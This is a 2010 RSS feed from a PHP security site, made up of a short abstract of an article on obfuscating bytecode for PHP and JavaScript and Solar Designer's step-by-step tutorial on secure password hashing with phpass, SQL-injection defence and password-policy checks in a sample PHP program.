the Month of PHP Security » Articles & Tools http://php-security.org "improving the security of the PHP ecosystem" Fri, 25 Jun 2010 15:27:22 +0000 http://wordpress.org/?v=2.9.2 en hourly 1 Article: Virtual Meta-Scripting Bytecode for PHP and JavaScript http://php-security.org/2010/05/31/article-virtual-meta-scripting-bytecode-for-php-and-javascript/ http://php-security.org/2010/05/31/article-virtual-meta-scripting-bytecode-for-php-and-javascript/#comments Mon, 31 May 2010 14:34:17 +0000 admin http://php-security.org/?p=396 As a last minute addition to the Month of PHP Security we present an article by Ben Fuhrmannek about virtual meta-scripting bytecode for PHP and JavaScript.

Ben Fuhrmannek, 2010-05-31

Abstract
Both PHP and JavaScript are frequently being targeted for exploiting web applications. This article elaborates on the idea of building a set of virtual machines on top of each programming language. As a result a single type of bytecode can be executed by both VMs. Particular emphasis is put on designing virtual machines to be most suitable for code obfuscation in a post exploitation scenario.

[PDF Article]

]]>
http://php-security.org/2010/05/31/article-virtual-meta-scripting-bytecode-for-php-and-javascript/feed/ 1
MOPS Submission 10: How to manage a PHP application’s users and passwords http://php-security.org/2010/05/26/mops-submission-10-how-to-manage-a-php-applications-users-and-passwords/ http://php-security.org/2010/05/26/mops-submission-10-how-to-manage-a-php-applications-users-and-passwords/#comments Wed, 26 May 2010 15:24:15 +0000 admin http://php-security.org/?p=354 It is time to present you the tenth and last external MOPS submission. It is an article by Solar Designer describing in length how to manage PHP application’s users and passwords.

How to manage a PHP application’s users and passwords


Alexander Peslyak
Founder and CTO
Openwall, Inc.


better known as


Solar Designer
Openwall Project leader

April 2010


Some rights reserved

Introduction

Almost all large PHP applications, as well as many small ones, have a notion of user accounts, and, whether we like it or not, they typically use passwords (or at best passphrases) to authenticate the users. How do they store the passwords (to authenticate against)? Reasonable applications don’t. Instead, they store password hashes. There have been many short articles, blog posts, even book chapters that try/claim to show you how to properly compute and use password hashes. Older ones will tell you to use the md5() function. Newer ones will tell you to use sha1() or hash() (SHA-256, etc.), add salting (but “forget” to add stretching, which is equally important), and use mysql_real_escape_string() on the username. Unfortunately, while some of these recommendations are steps in the right direction (although not all are), none of the articles on password security in PHP that I saw were “quite it”.

Finally, some of the more recent blog posts, forum comments, and the like have started to recommend phpass, the password/passphrase hashing framework for PHP that I wrote, and which has already been integrated into many popular “web applications” including phpBB3, WordPress, and Drupal 7. Obviously, I fully agree with this recommendation. However, I was not aware of an existing step-by-step guide on integrating phpass into a PHP application, and password security is not only about password hashing anyway.

In this article/tutorial, I will guide you through the steps needed to introduce proper (in my opinion at least) user/password management into a new PHP application. I will start by briefly explaining password/passphrase hashing and how to access the database safely. Then we will proceed through several revisions of the sample program. We’ll start with a very simple PHP program capable of creating new users only and having some subtle issues. We will gradually improve this program adding functionality (logging in to existing user accounts, changing user passwords, and enforcing a password policy) and “discovering” and dealing with the issues.

We will also briefly touch many related topics. Sub-headings have been chosen such that you may skip or skim over the topics you think you’re already familiar with… or better read those sections anyway.
Let’s get started.

Password/passphrase hashing

Decent systems/applications do not actually store users’ passwords. Instead, they transform new passwords being set/changed into password hashes with cryptographic (one-way) hash functions, and they store those hashes. They should preferably use hash functions intended for password hashing. Direct/naive use of other cryptographic hash functions, such as PHP’s md5(), sha1(), or hash(’sha256′, …) for that matter, has dire consequences.

When a user authenticates to the application with a username and a previously-set password, the application looks up some auxiliary information (such as the hash type, the salt, and the iteration count – all of which are
described below) for the provided username, transforms the provided password into its hash, and compares this hash against the one stored for the user. If the two hashes match, authentication succeeds (otherwise it fails).

- “Why bother with password hashing when I use (or don’t use) SSL (https URLs) anyway?”

(Surprisingly, this question is really being asked both ways. More often, people would make an incorrect statement that you don’t need password hashing, or don’t need to do it right, because you do or because you don’t use SSL.)

- Password hashing, if done right, reduces the risk impact of having the hashes stolen or leaked -
an attacker will recover fewer plaintext passwords from the hashes.

Also, the cost of recovery from an incident like this may be reduced – rather than change all passwords at once, which may be costly or prohibitive to do, a system’s administrator may audit the password hashes with a tool such as John the Ripper and only have the weak passwords changed. With proper password hashing and password policy enforcement in place, the majority of the passwords could be considered “strong enough” and would not need to be changed immediately even after a known and otherwise-resolved
security compromise.

The use of SSL mitigates the risk of having some plaintext passwords captured while in transit. Clearly, these risks are different. An attacker capable of capturing some of the network traffic is not necessarily capable of getting a copy of the database, and vice versa. Thus, it makes perfect sense to use one of these countermeasures – password hashing and SSL – without the other (which does not address “the other” risk then), and it also makes sense to use both of them together.

Salting

Salts are likely-unique values that are entered into a password hashing method along with the password, which results in the same password hashing into completely different hash values given different salts. Proper use of salts may defeat a number of attacks, including:

  • Ability to try candidate passwords against multiple hashes at the price of one
  • Use of pre-hashed lists (or the smarter “rainbow tables”) of candidate passwords
  • Ability to determine whether two users (or two accounts of one user) have the same or different passwords without actually having to guess one of the passwords

Salts are normally stored along with the hashes.
They are not secret.

Stretching

Offline password cracking (given stolen or leaked password hashes) involves computing hashes of large numbers of candidate passwords. Thus, in order to slow those attacks down, the computational complexity of a good password hashing method must be high – but of course not too high as to render it impractical.

Typical cryptographic hash functions not intended for password hashing were designed for speed. If these are directly misused for password hashing, then offline password cracking attacks may run at speeds of many million of candidate passwords per second.

These cryptographic hash functions (or even block ciphers) – let’s call them “cryptographic primitives” – may be used as building blocks to construct a decent password hashing method, which would use thousands or millions of
iterations of the underlying cryptographic primitive. This is called password (or key) stretching (or strengthening). Preferably, the number of iterations should not be hard-coded, but rather it should be configurable by an administrator for use when a new password is set (hashed), and it should be getting saved along with the hash (to allow the administrator to change the iteration count for newly set/changed passwords, yet not break support for previously-generated password hashes).

- “My web application must be fast. I can’t afford to use a slow hash function!”

- Actually, you can. No one said it should be taking an entire second to compute a password hash. Is 10 milliseconds fast enough for you? Perhaps it is, but if not you can make it 1 ms or less (which is likely way below other per-request “overhead” that your application incurs anyway) and still benefit from password stretching a lot. Please note that without any stretching a cryptographic primitive could be taking as little as some microseconds or even nanoseconds to compute (at least during an offline attack, which would use an optimal implementation). If you go from one microsecond to one millisecond, which is clearly affordable, you make offline attacks (against stolen or leaked hashes) run 1000 times slower, or you effectively stretch your users’ passwords or passphrases by about 10 bits of entropy each. That’s significant – it is roughly equivalent to each passphrase containing one additional word, without actually adding that extra word and having the users memorize it. Besides, the password hash is typically only computed when a user logs in (or when a new user is registered or a password is changed), which occurs relatively infrequently (compared to the frequency of other requests). Subsequent requests by the logged in user will use a session ID instead.

Choice of the underlying cryptographic primitive

The choice of the underlying cryptographic primitive – such as MD5, SHA-1, SHA-256, or even Blowfish or DES (which are block ciphers, yet they may be used to construct one-way hashes) – does not matter all that much. It’s the higher-level password hashing method, employing salting and stretching, that makes a difference.

- “I heard that MD5 has been “broken”. Shouldn’t we use SHA-1 instead?”

- It is true that MD5 has been broken as it relates to certain attacks (practical). SHA-1 has also been broken in certain other ways (mostly theoretical). However, neither break has anything to do with the uses of these functions for password hashing, especially not as building blocks in a higher-level hashing method. Thus, any possible reasons to move off MD5 or SHA-1 as underlying cryptographic primitives for password hashing “because of the break” are purely “political” rather than technical.

(It may be easier to just phase out MD5 and SHA-1 rather than differentiate their affected vs. unaffected uses.)

phpass – the password/passphrase hashing framework for PHP applications

phpass provides an easy to use abstraction layer on top of PHP’s cryptographic hash functions suitable for password hashing. As of this writing, it supports three password hashing methods, including two via PHP’s crypt() function – these are known in PHP as CRYPT_BLOWFISH and CRYPT_EXT_DES – and one implemented in phpass itself on top of MD5. All three employ salting, stretching, and variable iteration counts (configurable by an administrator, encoded/stored along with the hashes).

PHP 5.3.0 and above is guaranteed to support all three of these hashing methods due to code included into the PHP interpreter itself. Specific builds/installs of older versions of PHP may or may not support the CRYPT_BLOWFISH and CRYPT_EXT_DES methods – this is system-specific. For example, the Suhosin PHP security hardening patch, included into many distributions’ packages of PHP, has been adding support for CRYPT_BLOWFISH for years, many operating systems – such as *BSD’s, Solaris 10, SUSE Linux, ALT Linux, and indeed Openwall GNU/*/Linux – are also providing support for CRYPT_BLOWFISH via the system libraries (which PHP uses), and some operating systems – *BSD’s, Openwall GNU/*/Linux – also provide support for CRYPT_EXT_DES.

The MD5-based salted and stretched hashing implemented in phpass itself is supported on all systems – starting with the ancient PHP 3. phpass provides a way for you (the application developer or administrator) to force the use of these “portable” hashes – this is a Boolean parameter to the PasswordHash
constructor function.

Unless you force the use of “portable” hashes, phpass‘ preferred hashing method is CRYPT_BLOWFISH, with a fallback to CRYPT_EXT_DES, and then a final fallback to the “portable” hashes. CRYPT_BLOWFISH and CRYPT_EXT_DES are preferred primarily for the efficiency of the underlying implementations (in C and on some systems in assembly), compared to phpass‘ own code around MD5 (in PHP, even though the underlying MD5 code is in C). This greater code efficiency allows for more extensive and thus more effective use of password stretching (higher iteration counts).

(It is assumed that an attacker would have a near-optimal implementation of any of these hashing methods anyway.)

Besides the actual hashing, phpass transparently generates random salts when a new password or passphrase is hashed, and it encodes the hash type, the salt, and the password stretching iteration count into the “hash encoding string” that it returns. When phpass authenticates a password or passphrase against a stored hash, it similarly transparently extracts and uses the hash type identifier, the salt, and the iteration count out of the “hash encoding string”. Thus, you do not need to bother with salting and stretching on your own – phpass takes care of these for you.

- “What source of randomness does phpass use? Does it work on Windows?”

- You might have noticed that phpass uses /dev/urandom, which is a decent supply of randomness on modern Unix-like systems. However, phpass will transparently fallback to its own pseudo-random byte stream generator (which is based primarily on multiple measurements of the current time with up to microsecond precision) when /dev/urandom is unavailable or when it fails. Thus, yes, phpass works on Windows (as well as on Unix-like systems indeed),

Naturally, we’ll use phpass for our sample program.

The database (and how to access it safely)

SQL injections

What SQL injections are

In many cases, we will need to pass pieces of untrusted user input into SQL queries. Even with our trivial database and the initial revision of our user management program (which we’ll create soon), there will be untrusted user input: the username and password (or passphrase), at least before we’ve verified them. If we blindly embed the target username string obtained via a website form into an SQL query string, we might alter the SQL query. Since the username is under a potential attacker’s control, the attacker may be able to alter our SQL query in a way such that another valid SQL query of the attacker’s choice is formed. This may allow not only to circumvent our program’s intended behavior (e.g., have it change another user’s password with that altered query), but also to mount all sorts of attacks on the SQL server, as well as on our program (such as via query results that would suddenly become fully untrusted input as well).

How to deal with SQL injections

“- Can’t we just enclose the user inputs in single quotes when embedding them in an SQL query string? Wouldn’t that do the trick?”

- No. One of the input values can simply close the quotes, braces, etc., do its dirty deed, then provide additional SQL statements (or whatever) to make the rest of the original query “complete” (avoiding a syntax error). Thus, this naive approach alone does not work at all.

There are several real ways to combat SQL injections, of varying effectiveness and with different pros and cons.
Most of these can be used together for greater assurance.

  • Filtering – sanitize the input values rejecting or modifying “bad” ones (preferably using a whitelist of known-safe input values rather than a blacklist of known-unsafe ones)
  • Escaping – prefix any special characters (most notably the single quote character) with an escape character (preferably using the API functions specific to the target SQL server type)
  • Encoding – turn any input strings into other strings consisting of safe characters only – e.g., an application may introduce ‘%’ as its own escape character, then URL-encode all characters not from a known-safe set (the ‘%’ character has a special meaning in certain contexts, though, so you might choose another or you might only use this technique along with escaping)
  • Prepared statements – rather than form SQL query strings with inputs embedded into them (in one way or another), an application may use advanced APIs to pass SQL queries with placeholders to the SQL server and then pass the input values to the SQL server “separately”

In the sample program that we’ll be writing during the rest of this article, we’ll use filtering (the “rejection” kind of it) and prepared statements in such a way that if any one of these techniques fails to provide its security, the application will nevertheless remain secure.

Prepared statements with PHP and MySQL

As of this writing, PHP offers three main interfaces to MySQL: PHP’s MySQL Extension (obsolete, not recommended for new projects – but still widely used), PHP’s mysqli (MySQL Improved) Extension (“preferred” for new projects), and PHP Data Objects (PDO) (recommended, but not “preferred” for new projects). The last two of these support prepared statements. Both require PHP 5+. We’ll use mysqli.

The separation of code and data achieved with the mysqli PHP extension, the underlying MySQL APIs that it uses, and the (relatively) new MySQL protocol revision can’t be perfect – everything is sent over the same socket connection anyway – but it does appear to be way better (simpler, and hence less error-prone) than what could be achieved by escaping. Specifically, in the MySQL binary protocol, the input values are preceded by binary representations of their lengths in bytes and then are sent verbatim.

Beware: apparently, certain interfaces and older/transitional software versions emulate prepared statements on the client end, which makes them susceptible to the risks typical for SQL escaping. This is one of the reasons why we choose not to rely on prepared statements alone for security against SQL injections.

Employ the principle of least privilege

Besides avoiding SQL injections, it makes sense to mitigate any that would potentially occur anyway,
as well as possibly some other attacks carried out against or via the database. To this end, it is a good idea to have your PHP application use an SQL server account with the minimum privileges required – not an administrative account and not an account that can also access another database.

This also helps in case your PHP application is somehow fully compromised, such that the attacker gains direct access to the database with the application’s access privileges, yet you care not to let this compromise directly “propagate” onto other databases that your application does not use.

Schema

For our sample program, we’ll start with just one table in a brand new MySQL database. Connect to the MySQL server (such as with the command-line mysql client program) and issue the following:

create database myapp;
use myapp;
create table users (user varchar(60), pass varchar(60));


(We will need to revise this a little bit to deal with an issue that we’ll “discover” further down this article.)

The user column will hold usernames, and the pass column will hold password hashes. Currently, phpass produces hash encoding strings that are at most 60 characters long.

The sample program is born

The code snippets included in this article generally assume that you’re familiar with creating HTML web pages and PHP scripts. Thus, any opening and closing tags (such as <html> and <?php), etc. are omitted from here, to keep the article from growing too long. However, the sample files in the archive provided with the article do include all of those essential bits.

How to create new users

First, we need to put the phpass code in place. (We will use it to hash the new password.) We place the PasswordHash.php file from the phpass distribution tarball somewhere within our web “virtual host” “document root” directory and we set proper permissions for the file to be loaded by the web server’s PHP setup (typically, the Unix permission bits will need to be 600 or 644
depending on web server setup)
.

Then we create a subdirectory for our sample program (this is how multiple revisions of the program are included in the archive accompanying this article – in separate subdirectories). Let’s call the directory demo (and set its Unix permissions to 711). We’ll place two files into this directory: user-man.html (with permissions set to 644) containing the HTML form below, and user-man.php (with permissions set the same as we did for PasswordHash.php).

Let’s place the following HTML form into user-man.html:

<form action="user-man.php" method="POST">
Username:<br>
<input type="text" name="user" size="60"><br>
Password<br>
<input type="password" name="pass" size="60"><br>
<input type="submit" value="Create user">
</form>

This form asks for and submits a username and a password to the user-man.php script. Let’s start writing it. First, let’s include the phpass code:

require '../PasswordHash.php';

To actually use phpass, we need to decide on and specify the extent of password stretching and whether we want to force the use of “portable” hashes or not (both of these matters were briefly discussed above). Let’s place those constants into PHP variables:

// Base-2 logarithm of the iteration count used for password stretching
$hash_cost_log2 = 8;
// Do we require the hashes to be portable to older systems (less secure)?
$hash_portable = FALSE;

(In a real application, these should be in a configuration file included from the actual program code files instead. Alternatively, they may be configurable via the application itself, by an administrative user.)

To obtain the submitted username and password, let’s initially use:

$user = $_POST['user'];
// Should validate the username length and syntax here
$pass = $_POST['pass'];

(This is a bit problematic.
We will revise it soon.
)

Now we can hash the password with:

$hasher = new PasswordHash($hash_cost_log2, $hash_portable);
$hash = $hasher-&gt;HashPassword($pass);
if (strlen($hash) &lt; 20)
    fail('Failed to hash new password');
unset($hasher);

This uses the fact that the shortest valid password hash encoding string that phpass can currently return is 20 characters long (this is the case for CRYPT_EXT_DES, whereas other hash types use even longer
encoding strings)
. fail() is a custom function that we’ll use in our sample program. Let’s define it (earlier in the code) as follows:

function fail($pub, $pvt = '')
{
    $msg = $pub;
    if ($pvt !== '')
        $msg .= ": $pvt";
    exit("An error occurred ($msg).\n");
}

(This function as defined above is a bit problematic. We will revise it soon.)

Note that we don’t bother producing proper HTML output in fail(). For our sample program, it is simpler to produce plain text output. Let’s set the HTTP header accordingly such that the web browser does not attempt to parse our script’s output as HTML:

header('Content-Type: text/plain');

Indeed, we need to do this before our script possibly produces any output.

(In a real PHP application, you would likely be producing HTML output instead, which requires more code and extra safety measures.)

Let’s also place our database access credentials into PHP variables. For example:

// In a real application, these should be in a config file instead
$db_host = '127.0.0.1';
$db_port = 3306;
$db_user = 'mydbuser';
$db_pass = 'voulDyu0gue$s?';
$db_name = 'myapp';

Let’s connect to the database using mysqli, and let’s not forget to check for a possible failure:

$db = new mysqli($db_host, $db_user, $db_pass, $db_name, $db_port);
if (mysqli_connect_errno())
    fail('MySQL connect', mysqli_connect_error());

Finally, let’s try to create the user by inserting the username and the password hash encoding string (which includes the salt, etc.) into the database table using the prepared statements API:

($stmt = $db->prepare('insert into users (user, pass) values (?, ?)'))
    || fail('MySQL prepare', $db->error);
$stmt->bind_param('ss', $user, $hash)
    || fail('MySQL bind_param', $db->error);
$stmt->execute()
    || fail('MySQL execute', $db->error);

If we got this far, we must have successfully created the user. Let’s close the database connection:

$stmt->close();
$db->close();

In fact, it would be nice to do this on failure as well, but that would make the code more complicated
(the cleanups to perform would vary depending on where the failure occurs). Instead, we rely on the web server setup to perform any cleanups for terminating PHP scripts, which it needs to do anyway because scripts may sometimes terminate abnormally.

So that’s it. Please find the HTML file and the demo program we’ve just created, complete with all details and with the snippets in the proper order (unlike in this article), in the demo1 subdirectory in the accompanying archive (tar.gz, ZIP).

Let’s test the program. Go to the URL for the user-man.html HTML page in a web browser, enter myuser for the username and mypass for the password. If the script completes without error, we should be able to see the new user account in the users table:

mysql> select * from users;
+--------+--------------------------------------------------------------+
| user   | pass                                                         |
+--------+--------------------------------------------------------------+
| myuser | $2a$08$Lg5XF1Tt.X5TGyfb43vBBeEFZm4GTXQhKQ6SY6emkcnhAGT8KfxFS |
+--------+--------------------------------------------------------------+
1 row in set (0.00 sec)

The password hash will look almost completely different, though, due to the random salt and due to the hash possibly being of a different type (if you’re using PHP older than 5.3.0 and your build of PHP does not include the Suhosin patch and your operating system does not provide native support for CRYPT_BLOWFISH hashes… or if you edited the code to set $hash_portable to TRUE).

What if the user already exists?

Let’s try to create the same user, with the same username, once again. Also enter the same password, just for kicks. The script succeeds again, and we get:

mysql> select * from users;
+--------+--------------------------------------------------------------+
| user   | pass                                                         |
+--------+--------------------------------------------------------------+
| myuser | $2a$08$Lg5XF1Tt.X5TGyfb43vBBeEFZm4GTXQhKQ6SY6emkcnhAGT8KfxFS |
| myuser | $2a$08$7lM07FwQMm5/C8G/urT4z..MudfsS227e8oUEu6T51bNWk/RG//qe |
+--------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

We get a duplicate user record. We’ll need to address this shortcoming. Meanwhile, notice how the hash encoding string is indeed almost entirely different, as explained above, even though the same password was supplied.

We could issue a SELECT query to see if the username is already taken before trying to create the user. However, this would involve a race condition: a simultaneous request to our script could create a user of that name after our SELECT query but before we do the INSERT. Then we would end up creating a duplicate user record anyway.

To deal with this, we need to revise our database schema such that the MySQL server would not permit duplicate usernames:

DROP TABLE users;
CREATE TABLE users (user varchar(60), pass varchar(60), UNIQUE (user));

Now let’s repeat the experiment: create the same user twice via our web form. On our second attempt to create the user, the script fails with:

An error occurred (MySQL execute: Duplicate entry 'myuser' for key 1).

Checking the table contents, we see that only one instance of the user was created – just like we wanted. The message printed on an attempt to create a duplicate user is technical, though – not one suitable for an end user.
We’ll deal with this a bit later. Meanwhile, let’s focus on another aspect of it.

Avoid leaking server setup details

A portion of the error message above was produced by MySQL. On another occasion, it could possibly produce a message leaking the details of your setup – such as the database name, the database server address, and/or a full pathname to a database table file. We could want to avoid displaying this information to the user, unless we’re “the user” and we’re debugging. Also, those error messages may happen to contain characters that would need to be quoted if we were producing HTML output. Let’s modify the fail() function to support a non-debugging mode where it would not reveal the potentially-sensitive messages. Also, let’s add a comment about the “HTML issue”, such that it is hopefully not overlooked if this code is actually made to produce HTML output later.

// Are we debugging this code?  If enabled, OK to leak server setup details.
$debug = TRUE;

function fail($pub, $pvt = '')
{
    global $debug;
    $msg = $pub;
    if ($debug && $pvt !== '')
        $msg .= ": $pvt";
/* The $pvt debugging messages may contain characters that would need to be
 * quoted if we were producing HTML output, like we would be in a real app,
 * but we're using text/plain here.  Also, $debug is meant to be disabled on
 * a "production install" to avoid leaking server setup details. */

    exit("An error occurred ($msg).\n");
}

Please note that similar potential leaks of server setup details typically exist in the default settings of Apache and PHP. As an application developer, our responsibility here is to provide a way to avoid those leaks – which we did by introducing the $debug setting. It is up to a server administrator (or someone installing our PHP application on a server) to decide on and configure those settings in a certain way. It is a good idea to document the issue and the settings prominently. Also, it may be desirable to use safe defaults – that is, have $debug
default to FALSE in our case. However, for our sample program we’ll continue with a default of TRUE.

How to differentiate MySQL errors

We’d like to determine if the requested username is already taken – and show a user-friendly message if so. However, the attempt to add a user could fail for other reasons as well, so it would be wrong to show the same user-friendly message on all errors.

One of the approaches would be to issue a SELECT query on the username after an attempt to add the user fails. If the SELECT query returns 1 row, then the username is definitely already taken. We can implement this as follows:

if (!$stmt->execute()) {
    $save_error = $db->error;
    $stmt->close();

// Does the user already exist?
    ($stmt = $db->prepare('select user from users where user=?'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('s', $user)
        || fail('MySQL bind_param', $db->error);
    $stmt->execute()
        || fail('MySQL execute', $db->error);
    $stmt->store_result()
        || fail('MySQL store_result', $db->error);

    if ($stmt->num_rows === 1)
        fail('This username is already taken');
    else
        fail('MySQL execute', $save_error);
}

This works, and it might be the most reliable and portable approach, however there exists a shortcut approach: the MySQL server returns a very specific error code when the error is an attempt to create a duplicate user record. If we aren’t too concerned about a possible change in MySQL’s error codes in a future version of it, then we can simply check for the known error code. Even if this stops working, the only impact will be a less friendly message displayed to the user.

if (!$stmt->execute()) {
    if ($db->errno === 1062 /* ER_DUP_ENTRY */)
        fail('This username is already taken');
    else
        fail('MySQL execute', $db->error);
}

We will be using this shortcut approach in further revisions of the sample program.

The “Magic Quotes” issue

Magic Quotes is a deprecated feature of PHP. When enabled, which it is on many web servers, the PHP interpreter will automagically escape many inputs to PHP scripts. This may be desirable to provide some minimal security for poorly-written PHP scripts that fail to defend themselves against SQL injections, but with properly-written PHP scripts this feature may actually be more of a problem.

Specifically, unless we deal with this issue, a password containing the single quote character might or might not reach our PHP application with the character escaped. If the magic_quotes_gpc PHP setting is then toggled, or if our PHP application install is moved to another system where this setting is set differently, the password will stop working.

Thus, we need to check whether magic_quotes_gpc was set and undo its effect at least for specific inputs where this matters. Here’s the code:

function get_post_var($var)
{
    $val = $_POST[$var];
    if (get_magic_quotes_gpc())
        $val = stripslashes($val);
    return $val;
}

We’ll use this function instead of direct reads from $_POST[].

Input filtering

Let’s sanitize our inputs in order to mitigate some obscure DoS attacks, as well as not to rely on our use of prepared statements alone to prevent SQL injections.

$user = get_post_var('user');
/* Sanity-check the username, don't rely on our use of prepared statements
 * alone to prevent attacks on the SQL server via malicious usernames. */

if (!preg_match('/^[a-zA-Z0-9_]{1,60}$/', $user))
    fail('Invalid username');

$pass = get_post_var('pass');
/* Don't let them spend more of our CPU time than we were willing to.
 * Besides, bcrypt happens to use the first 72 characters only anyway. */

if (strlen($pass) > 72)
    fail('The supplied password is too long');

The sample program with the improvements mentioned so far implemented is found under the demo2 subdirectory in the accompanying archive (tar.gz, ZIP).

How to authenticate existing users

Let’s enhance our sample program with support for multiple operations – initially there will be two of them: creating a new user account and logging in to an existing account. We will be passing the operation code via a hidden form field. Let’s add it into our existing form:

<input type="hidden" name="op" value="new">

And let’s add a login form:

<form action="user-man.php" method="POST">
<input type="hidden" name="op" value="login">
Username:<br>
<input type="text" name="user" size="60"><br>
Password:<br>
<input type="password" name="pass" size="60"><br>
<input type="submit" value="Log in">
</form>

Now let’s start to add support into the PHP code. First, validate the operation code:

$op = $_POST['op'];
if ($op !== 'new' && $op !== 'login')
    fail('Unknown request');

Then let’s introduce an if statement and move our new user creation code under it:

if ($op === 'new') {
    $hash = $hasher->HashPassword($pass);
    if (strlen($hash) < 20)
        fail('Failed to hash new password');
    unset($hasher);

    ($stmt = $db->prepare('insert into users (user, pass) values (?, ?)'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('ss', $user, $hash)
        || fail('MySQL bind_param', $db->error);
    if (!$stmt->execute()) {
        if ($db->errno === 1062 /* ER_DUP_ENTRY */)
            fail('This username is already taken');
        else
            fail('MySQL execute', $db->error);
    }

    $what = 'User created';
}

To perform user authentication, we’ll need to obtain the user’s password hash encoding string using a SELECT query for the supplied username, then use the CheckPassword() method from phpass to check the supplied password against the hash. Let’s introduce an else branch with our “login” code in it:

} else {
    $hash = '*'; // In case the user is not found
    ($stmt = $db->prepare('select pass from users where user=?'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('s', $user)
        || fail('MySQL bind_param', $db->error);
    $stmt->execute()
        || fail('MySQL execute', $db->error);
    $stmt->bind_result($hash)
        || fail('MySQL bind_result', $db->error);
    if (!$stmt->fetch() && $db->errno)
        fail('MySQL fetch', $db->error);

    if ($hasher->CheckPassword($pass, $hash)) {
        $what = 'Authentication succeeded';
    } else {
        $what = 'Authentication failed';
    }
    unset($hasher);
}

Finally, let’s have our script print the authentication result:

echo "$what\n";

That’s all – we can now “log in” as myuser and see the “Authentication succeeded” message. If we enter a wrong password for the user or if the target username does not exist, we see “Authentication failed”.

Please find this revision of the HTML file and the sample program in the demo3 subdirectory in the accompanying archive (tar.gz, ZIP).

How to change user passwords

Let’s introduce the proper HTML form:

<form action="user-man.php" method="POST">
<input type="hidden" name="op" value="change">
Username:<br>
<input type="text" name="user" size="60"><br>
Current password:<br>
<input type="password" name="pass" size="60"><br>
New password:<br>
<input type="password" name="newpass" size="60"><br>
<input type="submit" value="Change password">
</form>

and support for the additional operation code into the PHP script:

$op = $_POST['op'];
if ($op !== 'new' && $op !== 'login' && $op !== 'change')
    fail('Unknown request');

Now let’s add to the user authentication branch of the existing if / else statement. When authentication fails, reset $op such that we don’t take any other action:

    if ($hasher->CheckPassword($pass, $hash)) {
        $what = 'Authentication succeeded';
    } else {
        $what = 'Authentication failed';
        $op = 'fail'; // Definitely not 'change'
    }

Then add our new code:

    if ($op === 'change') {
        $stmt->close();

        $newpass = get_post_var('newpass');
        if (strlen($newpass) > 72)
            fail('The new password is too long');
        $hash = $hasher->HashPassword($newpass);
        if (strlen($hash) < 20)
            fail('Failed to hash new password');
        unset($hasher);

        ($stmt = $db->prepare('update users set pass=? where user=?'))
            || fail('MySQL prepare', $db->error);
        $stmt->bind_param('ss', $hash, $user)
            || fail('MySQL bind_param', $db->error);
        $stmt->execute()
            || fail('MySQL execute', $db->error);

        $what = 'Password changed';
    }

That’s it – an existing user may now get the password changed.

This revision of the HTML file and the sample program may be found in the demo4 subdirectory in the accompanying archive (tar.gz, ZIP).

In a real PHP application, you will likely also have other ways to change a user’s password – by an administrative user (then authentication of the user is bypassed) or with authentication by a temporary token (for forgotten passwords). These may be implemented in a similar fashion.

How to enforce a password policy

As far as I’m aware, there’s currently no decent password/passphrase strength checking module intended specifically for PHP (either written in PHP or implemented as a PHP extension). (The Crack extension in PECL, which is an interface to CrackLib, is not quite it (just like CrackLib itself is not good enough these days). There are many regexp-based recipes found on the web, but these disregard/disallow passphrases, have the policy hard-coded, and are mostly untested on real-world passwords.)

So we will be invoking the pwqcheck(1) program from the passwdqc package. This program is specifically intended for use from scripts.

Let’s introduce a new PHP include file, called pwqcheck.php, defining the following function:

function pwqcheck($newpass, $oldpass = '', $user = '', $aux = '', $args = '')
{
// pwqcheck(1) itself returns the same message on internal error
    $retval = 'Bad passphrase (check failed)';

    $descriptorspec = array(
        0 => array('pipe', 'r'),
        1 => array('pipe', 'w'));
// Leave stderr (fd 2) pointing to where it is, likely to error_log

// Replace characters that would violate the protocol
    $newpass = strtr($newpass, "\n", '.');
    $oldpass = strtr($oldpass, "\n", '.');
    $user = strtr($user, "\n:", '..');

// Trigger a "too short" rather than "is the same" message in this special case
    if (!$newpass && !$oldpass)
        $oldpass = '.';

    if ($args)
        $args = ' ' . $args;
    if (!$user)
        $args = ' -2' . $args; // passwdqc 1.2.0+

    $command = 'exec '; // No need to keep the shell process around on Unix
    $command .= 'pwqcheck' . $args;
    if (!($process = @proc_open($command, $descriptorspec, $pipes)))
        return $retval;

    $err = 0;
    fwrite($pipes[0], "$newpass\n$oldpass\n") || $err = 1;
    if ($user)
        fwrite($pipes[0], "$user::::$aux:/:\n") || $err = 1;
    fclose($pipes[0]) || $err = 1;
    ($output = stream_get_contents($pipes[1])) || $err = 1;
    fclose($pipes[1]);

    $status = proc_close($process);

// There must be a linefeed character at the end.  Remove it.
    if (substr($output, -1) === "\n")
        $output = substr($output, 0, -1);
    else
        $err = 1;

    if ($err === 0 && ($status === 0 || $output !== 'OK'))
        $retval = $output;

    return $retval;
}

Please note that this passes any untrusted input via the file descriptor, not via the command-line (which would be unsafe). Please refer to the pwqcheck(1) manual page included in the passwdqc package for information on the command-line options and on the “protocol” used.

The function accepts the new password or passphrase, the strength of which is to be checked. It optionally also accepts the old password or passphrase, the username, and any auxiliary user-specific information such as the user’s full name and/or e-mail address (multiple items may be separated with spaces). All of this information is treated as untrusted input, and it is used for more accurate checking of the strength of the new password or passphrase.

Finally, the function optionally accepts additional arguments to pass to pwqcheck(1) via the command-line.
These may override the default password policy. Obviously, they must not be under an untrusted user’s control.

The return value is the string ‘OK’ if the new password/passphrase passes the requirements. Otherwise the return value is a message explaining one of the reasons why the password/passphrase is rejected.

Let’s make use of this in our program. Include the file and define some settings (that we’ll use a bit later):

require 'pwqcheck.php';

// Do we have the pwqcheck(1) program from the passwdqc package?
$use_pwqcheck = TRUE;
// We can override the default password policy
#$pwqcheck_args = 'config=/etc/passwdqc.conf';

Define a wrapper function specific to our program:

function my_pwqcheck($newpass, $oldpass = '', $user = '')
{
    global $use_pwqcheck, $pwqcheck_args;
    if ($use_pwqcheck)
        return pwqcheck($newpass, $oldpass, $user, '', $pwqcheck_args);

/* Some really trivial and obviously-insufficient password strength checks -
 * we ought to use the pwqcheck(1) program instead. */

    $check = '';
    if (strlen($newpass) < 7)
        $check = 'way too short';
    else if (stristr($oldpass, $newpass) ||
        (strlen($oldpass) >= 4 && stristr($newpass, $oldpass)))
        $check = 'is based on the old one';
    else if (stristr($user, $newpass) ||
        (strlen($user) >= 4 && stristr($newpass, $user)))
        $check = 'is based on the username';
    if ($check)
        return "Bad password ($check)";
    return 'OK';
}

